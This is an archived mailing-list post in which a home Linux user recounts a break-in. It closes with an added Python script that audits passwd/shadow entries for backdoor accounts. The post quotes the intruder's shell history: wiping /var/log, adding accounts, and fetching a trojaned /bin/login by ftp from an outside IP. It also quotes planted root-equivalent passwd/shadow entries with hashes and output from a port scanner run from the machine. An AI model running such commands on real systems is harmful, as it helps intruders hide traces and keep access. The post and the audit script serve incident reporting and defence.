I'm sending this here mainly for archival reasons... this is
probably mostly interesting to Unix geeks.

Around 3:41am yesterday, someone cracked into my home machine
(connected full-time via cablemodem) and used it to probe another
network. I was awake and working, and noticed something was up by
the unusual pattern of my cablemodem's lights.

I made the mistake of killing the attacker's connection before
securing my machine, then he/she apparently logged back in and
did something nasty, because my desktop disappeared and I couldn't
regain control by switching to a text console... had to reboot.
(first reboot since I installed the machine in January. :)

Of course, as soon as the screen went black I ripped out the
ethernet cable from the back of the machine, somewhat freaked out
at this point. ;)

After rebooting, I couldn't log in because my /bin/login had been
replaced with something else. So I reinstalled most of my base
system (which I would've done anyway, since I didn't know what
he/she had messed with), and compiled and installed ssh.

That'll teach me to run a system without software autoupgrades
and/or a firewall installed...

Here are more details from a message I sent to a list at work
yesterday:
> The first thing he did was rm -rf /var/log , so there isn't much
> of a log. I found this in /root/.bash_history:
>
> cd /var/
> rm -rf log
> users
> vhosts
> uptime
> exit
> w
> /usr/sbin/adduser mat
> passwd mat
> rm -rf /var/log/*
> exit
> cd /etc/
> ls
> pico inetd.conf
> rm -rf /var/log/*
> exit
> mv login /bin
> dir
> w
> mv login /bin
> chmod 777 login
> mv login /bin
> pico login
> cd /bin
> dir
> ftp 207.170.22.77
> dir
> pico login
> rm login
> cd /tmp
> mv login /bin
> chmod +x /bin/login
> exit
>
> And he created some new entries in /etc/passwd and /etc/shadow:
>
> own:x:0:0::/root:/bin/bash
> adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash
> mat:x:12818:12818::/home/mat:/bin/bash
>
> own::10865:0:99999:7:-1:-1:134538460
> adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
> mat:$1$YR62NIer$Y7gtqjzDiT5ic1TLmEi5u/:11056:0:99999:7:-1:-1:134550500
>
> /home/mat doesn't have much of interest afterwards:
>
> root@devo: mat> ll
> total 32
> drwx------ 2 mat mat 4096 Apr 9 16:54 ./
> drwxr-xr-x 18 root root 4096 Apr 10 03:53 ../
> -rw-r--r-- 1 mat mat 1422 Apr 9 16:22 .Xdefaults
> -rw------- 1 mat mat 27 Apr 9 22:04 .bash_history
> -rw-r--r-- 1 mat mat 24 Apr 9 16:22 .bash_logout
> -rw-r--r-- 1 mat mat 230 Apr 9 16:22 .bash_profile
> -rw-r--r-- 1 mat mat 124 Apr 9 16:22 .bashrc
> -rw-r--r-- 1 mat mat 3394 Apr 9 16:22 .screenrc
>
> /home/mat/.bash_history contains:
>
> Is
> Ls
> ls
> ftp
> w
> ls
> cd /root
>
> When I noticed some strange network traffic (from blinking lights
> on my cablemodem), I ran tcpdump to see what's up:
>
> 04:03:10 <ger-home> e-t, still there?
> 04:04:02 <ger-home> there's a ton of traffic coming into
> [sic] my home machine... pings or probes or something.
> 04:04:16 <ger-home> 04:02:17.024287 >
> r95aag008980.sbo-smr.ma.cable.rcn.com.2532 >
> mnc-esp.ind.net.domain: S 548284530:548284530(0) win 32120
> <mss 1460,sackOK,timestamp 614510582 0,nop,wscale 0> (DF)
> 04:04:17 <ger-home> 04:02:17.024350 >
> r95aag008980.sbo-smr.ma.cable.rcn.com.2533 >
> mnc-axis.ind.net.domain: S 546972039:546972039(0) win 32120
> <mss 1460,sackOK,timestamp 614510582 0,nop,wscale 0> (DF)
> 04:04:55 <ger-home> yikes!
> 04:04:58 <ger-home> root 5228 0.0 0.6 1684 808
> pts/24 S 03:56 0:00 sh ./ibind.sh 199.8
> 04:04:58 <ger-home> root 5238 98.7 0.3 1076 392
> pts/24 R 03:56 8:21 ./pscan 199.8 53
> 04:05:35 <ger-home> and I just noticed my /var/log
> disappeared... crap
> 04:05:41 <ger-home> (earlier tonight I noticed, I mean)
> 04:05:59 <ger-home> crap crap crap... I've been hacked
>
> 04:08:37 <-- ger-home has quit (EOF From client)
>
> [ reinstalled my base system, compiled and re-installed ssh ]
>
> 05:41:51 --> ger-home ([email protected]) has joined &sysreq
> 05:43:13 <ger-home> what a $#%& pain
> 05:43:46 <ger-home> I killed the cracker's connection to my
> machine, and he logged back in and killed my session...
> had to reboot.
> 05:43:58 <ger-home> and he replaced my /bin/login with
> something else, ...
>
--
Gerald Oskoboiny <[email protected]>
http://impressive.net/people/gerald/
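The /etc/passwd and /etc/shadow entries quoted in the post show the usual shape of a backdoor account: a second UID-0 login, an empty shadow password field, a home directory in /tmp. The script below is an added example (not part of the original post) that parses passwd/shadow-format text and flags exactly those properties. Its sample input is the three quoted entries plus a normal root line constructed here as a control; the root hash is a placeholder, not a real password hash. On a live system you would feed it the contents of /etc/passwd and /etc/shadow instead.

```python
"""Audit passwd/shadow entries for backdoor-style accounts.

Added example, not part of the original post.  Sample lines are the
three entries quoted in the post plus a constructed root control line
(its hash is a placeholder).
"""
from collections import namedtuple
from typing import Dict, List, Tuple

# Sample input: quoted entries from the post plus a constructed root line.
PASSWD_LINES = """\
root:x:0:0:root:/root:/bin/bash
own:x:0:0::/root:/bin/bash
adm1:x:5000:5000:Tech Admin:/tmp:/bin/bash
mat:x:12818:12818::/home/mat:/bin/bash
"""

SHADOW_LINES = """\
root:$1$placehol$ABCDEFGHIJKLMNOPQRSTUV:10800:0:99999:7:::
own::10865:0:99999:7:-1:-1:134538460
adm1:Yi2yCGHo0wOwg:10884:0:99999:7:-1:-1:134538412
mat:$1$YR62NIer$Y7gtqjzDiT5ic1TLmEi5u/:11056:0:99999:7:-1:-1:134550500
"""

PasswdEntry = namedtuple("PasswdEntry", "name pw uid gid gecos home shell")


def parse_passwd(text: str) -> Dict[str, PasswdEntry]:
    """Parse passwd(5)-format text into a name -> entry mapping."""
    entries = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:  # blank or malformed line
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries[name] = PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell)
    return entries


def parse_shadow(text: str) -> Dict[str, str]:
    """Return name -> password-hash field from shadow(5)-format text."""
    hashes = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        hashes[fields[0]] = fields[1]
    return hashes


def audit(passwd_text: str, shadow_text: str) -> List[Tuple[str, str]]:
    """Return (account, reason) findings for entries that look like backdoors."""
    findings = []
    accounts = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    for name, acct in accounts.items():
        # Any UID-0 account other than root is root-equivalent.
        if acct.uid == 0 and name != "root":
            findings.append((name, "extra UID-0 (root-equivalent) account"))
        # A world-writable scratch directory is no place for a home.
        if acct.home.startswith("/tmp"):
            findings.append((name, "home directory under /tmp"))
        # 'x' in passwd promises a shadow entry; a missing one is suspicious.
        if acct.pw == "x" and name not in hashes:
            findings.append((name, "password shadowed but no shadow entry"))
        if name in hashes:
            h = hashes[name]
            if h == "":
                # Empty hash field: classic login accepts any/no password.
                findings.append((name, "empty password field: login needs no password"))
            elif not h.startswith(("$", "!", "*")) and len(h) == 13:
                # Traditional 13-character DES crypt, trivially brute-forced.
                findings.append((name, "legacy 13-character DES crypt hash"))
    return findings


if __name__ == "__main__":
    for account, reason in audit(PASSWD_LINES, SHADOW_LINES):
        print(f"{account}: {reason}")
```

Run against the quoted entries, the audit flags `own` twice (second UID 0, empty password) and `adm1` twice (/tmp home, DES hash), while the `mat` account passes these structural checks and would only stand out by not belonging to anyone. That is the point of the post's evidence: the cheap, automatable checks catch most of what was planted, but you still need an inventory of which accounts should exist.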